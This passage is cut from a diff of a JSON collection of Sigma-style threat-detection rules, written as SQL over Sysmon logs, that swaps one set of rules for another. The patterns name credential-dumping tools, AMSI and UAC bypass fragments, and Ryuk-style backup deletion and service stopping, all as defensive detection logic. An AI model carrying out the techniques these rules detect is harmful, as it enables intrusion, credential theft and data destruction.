'%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 
'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep 
bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine 
LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": 
"proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + 
"attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND 
(CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": 